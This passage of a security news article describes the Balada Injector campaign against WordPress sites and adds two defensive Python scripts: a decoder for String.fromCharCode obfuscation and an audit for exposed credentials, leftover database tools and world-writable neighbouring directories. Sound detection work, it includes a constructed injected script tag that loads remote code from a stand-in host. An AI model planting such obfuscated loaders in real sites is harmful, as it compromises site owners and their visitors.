Over one million WordPress websites have been infected by the malware Balada Injector. The campaign that deploys it has been active since 2017.
How does it work?
According to reports from GoDaddy’s Sucuri, the long-running campaign “leverages all recognized and only newly created theme and plugin vulnerabilities” to compromise WordPress websites. The attacks are reported to come in waves every few weeks.
Here’s what Denis Sinegubko, a security researcher at Sucuri, said about it:
“This campaign is clearly recognizable by its predilection for String.fromCharCode obfuscation, the use of recently registered web addresses hosting malicious programs on various subdomains, and by links to numerous scam sites.”
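The String.fromCharCode trick mentioned above hides a URL or script as a list of character codes so that a grep for the attacker's domain finds nothing. The following decoder is an added example written for this article, not code from Sucuri's report or from the malware: it pulls every String.fromCharCode(...) call out of a page, rebuilds the literal it produces, and flags any URL that points to a host the site owner did not expect. The sample injected tag and the decoded domain example.invalid are constructed for the demo and are not indicators from the report.

```python
import re
from urllib.parse import urlparse

# Matches String.fromCharCode(...) with a list of decimal or 0x-prefixed
# character codes, the literal-list form of the obfuscation.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9a-fA-FxX\s,]*)\)")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def decode_fromcharcode(arg_list: str) -> str:
    """Rebuild the string that a String.fromCharCode argument list produces."""
    chars = []
    for tok in arg_list.split(","):
        tok = tok.strip()
        if not tok:
            continue
        code = int(tok, 16) if tok.lower().startswith("0x") else int(tok)
        chars.append(chr(code))
    return "".join(chars)


def find_obfuscated_strings(source: str) -> list:
    """Return every literal that String.fromCharCode calls in `source` decode to."""
    return [decode_fromcharcode(m.group(1)) for m in FROMCHARCODE_RE.finditer(source)]


def flag_offsite_loads(source: str, allowed_hosts=()) -> list:
    """Return decoded URLs whose host is not one the site owner expects.
    A script that hides a URL this way and points off-site is a strong injection signal."""
    hits = []
    for decoded in find_obfuscated_strings(source):
        for url in URL_RE.findall(decoded):
            host = urlparse(url).hostname or ""
            if host not in allowed_hosts:
                hits.append(url)
    return hits


def _to_charcodes(text: str) -> str:
    """Helper used only to build the constructed sample below."""
    return ",".join(str(ord(c)) for c in text)


# Constructed sample of an injected tag (assumption for this demo, not a real capture);
# the decoded URL uses the reserved .invalid TLD so it can never resolve.
SAMPLE_INJECTED_HTML = (
    "<script>var s=document.createElement('script');"
    "s.src=String.fromCharCode(" + _to_charcodes("https://example.invalid/s.js") + ");"
    "document.head.appendChild(s);</script>"
)

if __name__ == "__main__":
    print(find_obfuscated_strings(SAMPLE_INJECTED_HTML))
    print(flag_offsite_loads(SAMPLE_INJECTED_HTML, allowed_hosts=("www.mysite.example",)))
```

This only handles the literal numeric-list form; real injections often wrap the decoded string in another layer (eval, atob, string reversal), so treat a non-empty result as a lead to inspect by hand rather than as a complete cleanup.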
Visitors to compromised websites are redirected to scam pages: fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages that trick victims into enabling browser notifications, which the criminals then use to push spam.
What else is Balada Injector able to affect?
The report builds on a recent Doctor Web study that described in detail how a Linux malware family attacking WordPress sites operates.
Balada Injector has over 100 domains and a variety of techniques at its disposal for exploiting known flaws such as HTML injection and Site URL injection. The attackers’ main target is the database credentials stored in the wp-config.php file.
The attacks also try to read or copy arbitrary site files, including database dumps, log and error files and backups, and they look for tools such as Adminer and phpMyAdmin that administrators may have left behind after finishing maintenance work.
The malware can also create rogue WordPress admin users, harvest data from the underlying hosts, and plant backdoors for persistent access.
Balada Injector also searches upward from the compromised site’s directory to the top-level directories of the file system, looking for writable directories that belong to other websites on the same host.
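The three things described above (readable wp-config.php credentials, leftover database tools and backups, writable directories of neighbouring sites) can all be checked from the defender's side with a file-system walk. The script below is an added example for this article, not Sucuri's tooling or anything from the malware: it audits one WordPress docroot for those artifacts and then walks up toward a hosting directory listing world-writable sibling directories, the same view an injected script would get. The tool names, suffix list and the shared-hosting layout it builds under a temporary directory are assumptions made for the demo.

```python
import stat
import tempfile
from pathlib import Path

# Names of leftover DB tools to look for; assumed for this example, not from the report.
LEFTOVER_TOOLS = {"adminer.php", "adminer", "phpmyadmin", "phpMyAdmin", "pma"}
# Suffixes that typically hold database dumps, logs and backups (assumed list).
EXPOSED_SUFFIXES = (".sql", ".sql.gz", ".zip", ".tar.gz", ".log", ".bak")


def audit_docroot(docroot: Path) -> dict:
    """Check one WordPress docroot for the artifacts the campaign hunts for."""
    docroot = docroot.resolve()
    findings = {"world_readable_config": [], "leftover_tools": [], "exposed_files": []}
    config = docroot / "wp-config.php"
    if config.is_file() and config.stat().st_mode & stat.S_IROTH:
        # Any local user, including a neighbouring site's web user, can read the DB credentials.
        findings["world_readable_config"].append(str(config))
    for path in docroot.rglob("*"):
        rel = str(path.relative_to(docroot))
        if path.name in LEFTOVER_TOOLS:
            findings["leftover_tools"].append(rel)
        if path.is_file() and path.name.endswith(EXPOSED_SUFFIXES):
            findings["exposed_files"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


def world_writable_dirs_between(docroot: Path, top: Path) -> list:
    """Walk from docroot up to `top`, listing world-writable directories at each
    level that are not on the path to docroot. This mirrors the malware's search
    for writable directories belonging to other sites on the same host."""
    docroot = docroot.resolve()
    top = top.resolve()
    found = []
    current = docroot
    while current != top and current != current.parent:
        parent = current.parent
        for sibling in sorted(parent.iterdir()):
            if sibling != current and sibling.is_dir() and sibling.stat().st_mode & stat.S_IWOTH:
                found.append(str(sibling))
        current = parent
    return found


def build_sample_layout() -> tuple:
    """Constructed shared-hosting layout for the demo (not a real server):
    hosting/site_a is the audited site, site_b is a world-writable neighbour."""
    hosting = Path(tempfile.mkdtemp(prefix="hosting_"))
    site_a = hosting / "site_a"
    uploads = site_a / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    for d in (site_a, site_a / "wp-content", uploads):
        d.chmod(0o755)
    config = site_a / "wp-config.php"
    config.write_text("<?php define('DB_PASSWORD', 'not-a-real-secret');\n")
    config.chmod(0o644)                      # the weak setting: world-readable credentials
    (site_a / "adminer.php").write_text("<?php // leftover DB tool\n")
    (uploads / "backup.sql").write_text("-- constructed dump\n")
    (hosting / "site_b").mkdir()
    (hosting / "site_b").chmod(0o777)        # world-writable neighbouring site
    (hosting / "site_c").mkdir()
    (hosting / "site_c").chmod(0o755)        # properly locked-down neighbour
    hosting.chmod(0o755)
    return hosting, site_a


def run_demo() -> dict:
    """Build the constructed layout, audit site_a and report writable neighbours."""
    hosting, site_a = build_sample_layout()
    result = audit_docroot(site_a)
    result["world_writable_neighbours"] = [
        str(Path(p).relative_to(hosting)) for p in world_writable_dirs_between(site_a, hosting)
    ]
    return result


if __name__ == "__main__":
    for key, items in run_demo().items():
        print(f"{key}: {items}")
```

On a real host, point audit_docroot at the site root and world_writable_dirs_between at the directory that holds all accounts; wp-config.php should end up mode 0640 or 0600 owned by the site user, and any directory the audit lists as world-writable is a path by which one compromised account can infect the others.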
How was it actually discovered?